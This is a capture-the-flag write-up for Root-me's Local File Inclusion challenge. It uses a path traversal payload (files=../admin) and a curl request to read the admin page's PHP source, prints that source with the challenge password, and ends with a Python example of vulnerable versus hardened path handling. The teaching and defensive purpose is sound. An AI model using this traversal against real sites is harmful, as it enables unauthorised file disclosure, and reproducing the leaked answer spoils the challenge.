Root-me

Local File Inclusion

Abbreviated LFI

Our goal is to get to the admin section.

When we get to the challenge page, we’re greeted by a “File viewer”. There are a few categories with files inside. If we browse to one and look at the URL, we can start playing around with it.

http://challenge01.root-me.org/web-serveur/ch16/?files=sysadm

We need to get to the admin section, and we know that the URL for the admin section is http://challenge01.root-me.org/web-serveur/ch16/admin/

So we could try going back up a folder.

http://challenge01.root-me.org/web-serveur/ch16/?files=../admin

There’s a file inside, an index.php. We fetch it with curl (the URL is quoted so the shell does not treat the & as a background operator):

curl "http://challenge01.root-me.org/web-serveur/ch16/?files=../admin&f=index.php"

	  <h1>File viewer v 0.01</h1><span id="mnenu"/>&nbsp;|&nbsp;<span>
      <a href="?files=sysadm">sysadm</a></span>&nbsp;|&nbsp;<span>
      <a href="?files=reseau">reseau</a></span>&nbsp;|&nbsp;<span>
      <a href="?files=esprit">esprit</a></span>&nbsp;|&nbsp;<span>
      <a href="?files=crypto">crypto</a></span>&nbsp;|&nbsp;<span>
      <a href="?files=coding">coding</a></span>&nbsp;|&nbsp;<span>
      <a href="?files=archives">archives</a></span>&nbsp;|
      <span style='text-align: right; float:right;'>Connected as : <b>guest</b>&nbsp;|&nbsp;
      <a href="admin/">admin</a></span><br/><hr/><table id="content"><tr><td style="vertical-align: top;">
      <a href="?files=../admin&f=index.php" ><img width="32px" height="32px" src="text.gif" alt="index.php">index.php</a><br/></td>
      <td style="vertical-align: top;"></td></tr></table></body></html>
      
<pre>&lt;?php

function http_digest_parse($txt)
{
    $needed_parts = array('nonce'=&gt;1, 'nc'=&gt;1, 'cnonce'=&gt;1, 'qop'=&gt;1, 'username'=&gt;1, 'uri'=&gt;1, 'response'=&gt;1);
    $data = array();
    $keys = implode('|', array_keys($needed_parts));
 
    preg_match_all('@(' . $keys . ')=(?:([\'&quot;])([^\2]+?)\2|([^\s,]+))@', $txt, $matches, PREG_SET_ORDER);

    foreach ($matches as $m) {
        $data[$m[1]] = $m[3] ? $m[3] : $m[4];
        unset($needed_parts[$m[1]]);
    }

    return $needed_parts ? false : $data;
}


function auth($realm){
    header('HTTP/1.1 401 Unauthorized');
    header('WWW-Authenticate: Digest realm=&quot;'.$realm.'&quot;,qop=&quot;auth&quot;,nonce=&quot;'.uniqid().'&quot;,opaque=&quot;'.md5($realm).'&quot;');
    die($realm);
}


$realm = 'PHP Restricted area';
$users = array('admin' =&gt; 'OpbNJ60xYpvAQU8');


if (empty($_SERVER['PHP_AUTH_DIGEST'])) {
  auth($realm);
}

if (!($data = http_digest_parse($_SERVER['PHP_AUTH_DIGEST'])) || !isset($users[$data['username']]))
    auth($realm);


$A1 = md5($data['username'] . ':' . $realm . ':' . $users[$data['username']]);
$A2 = md5($_SERVER['REQUEST_METHOD'].':'.$data['uri']);
$valid_response = md5($A1.':'.$data['nonce'].':'.$data['nc'].':'.$data['cnonce'].':'.$data['qop'].':'.$A2);

if ($data['response'] != $valid_response)
    auth($realm);

echo &quot;&lt;html&gt;
	&lt;head&gt;&lt;/head&gt;
	&lt;body&gt;
	    &lt;h3&gt;You could use this password to validate the challenge !&lt;/h3&gt;
	&lt;/body&gt;
      &lt;/html&gt;&quot;;

?&gt;</pre><hr/></td></tr></table></body></html>

We got the password in the file: OpbNJ60xYpvAQU8
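The root cause is that the viewer builds a filesystem path straight from the `files` and `f` parameters. The following is an added Python illustration, not the challenge's own code: it mirrors that broken path construction and shows a hardened lookup that combines an allowlist of the category names seen on the page with a containment check against the base directory. The base directory and the file names are assumptions.

```python
import os
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Constructed layout mirroring the challenge: the browsable categories live
# under a base directory, and admin/ sits one level up, beside it.
BASE_DIR = "/var/www/ch16/files"   # assumed, not taken from the page
CATEGORIES = {"sysadm", "reseau", "esprit", "crypto", "coding", "archives"}

def vulnerable_path(files: str, f: str) -> str:
    """The pattern that makes the viewer exploitable: both GET parameters are
    joined onto the base directory with no validation, so files=../admin and
    f=index.php resolves one level up, outside the intended directory."""
    return os.path.normpath(os.path.join(BASE_DIR, files, f))

def safe_path(files: str, f: str) -> Optional[str]:
    """Hardened lookup. Returns the path relative to BASE_DIR, or None when
    the request is rejected. Two independent controls are applied:
    1. 'files' must be a known category name (allowlist) and 'f' a bare
       filename with no directory component or NUL byte;
    2. the normalised path must still lie inside BASE_DIR (containment),
       which catches anything the first check might miss."""
    if files not in CATEGORIES:
        return None
    if not f or f in (".", "..") or "/" in f or "\\" in f or "\0" in f:
        return None
    base = os.path.normpath(BASE_DIR)
    candidate = os.path.normpath(os.path.join(base, files, f))
    # If the longest common prefix is not the base itself, the candidate
    # escaped the base directory.
    if os.path.commonpath([base, candidate]) != base:
        return None
    return os.path.relpath(candidate, base)

def check_url(url: str) -> Optional[str]:
    """Apply safe_path to the query string of a viewer URL such as the one
    used above, i.e. ?files=../admin&f=index.php."""
    qs = parse_qs(urlsplit(url).query)
    return safe_path(qs.get("files", [""])[0], qs.get("f", [""])[0])

if __name__ == "__main__":
    print(vulnerable_path("../admin", "index.php"))
    print(check_url("http://challenge01.root-me.org/web-serveur/ch16/?files=../admin&f=index.php"))
    print(check_url("http://challenge01.root-me.org/web-serveur/ch16/?files=sysadm&f=notes.txt"))
```

The containment check alone would already block the traversal used here; the allowlist is there so that a new bypass of the normalisation step still cannot name an unexpected directory.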